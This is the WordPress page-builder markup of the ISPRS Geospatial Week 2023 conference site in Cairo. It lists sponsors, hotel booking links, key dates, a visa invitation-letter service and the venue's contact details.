rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" 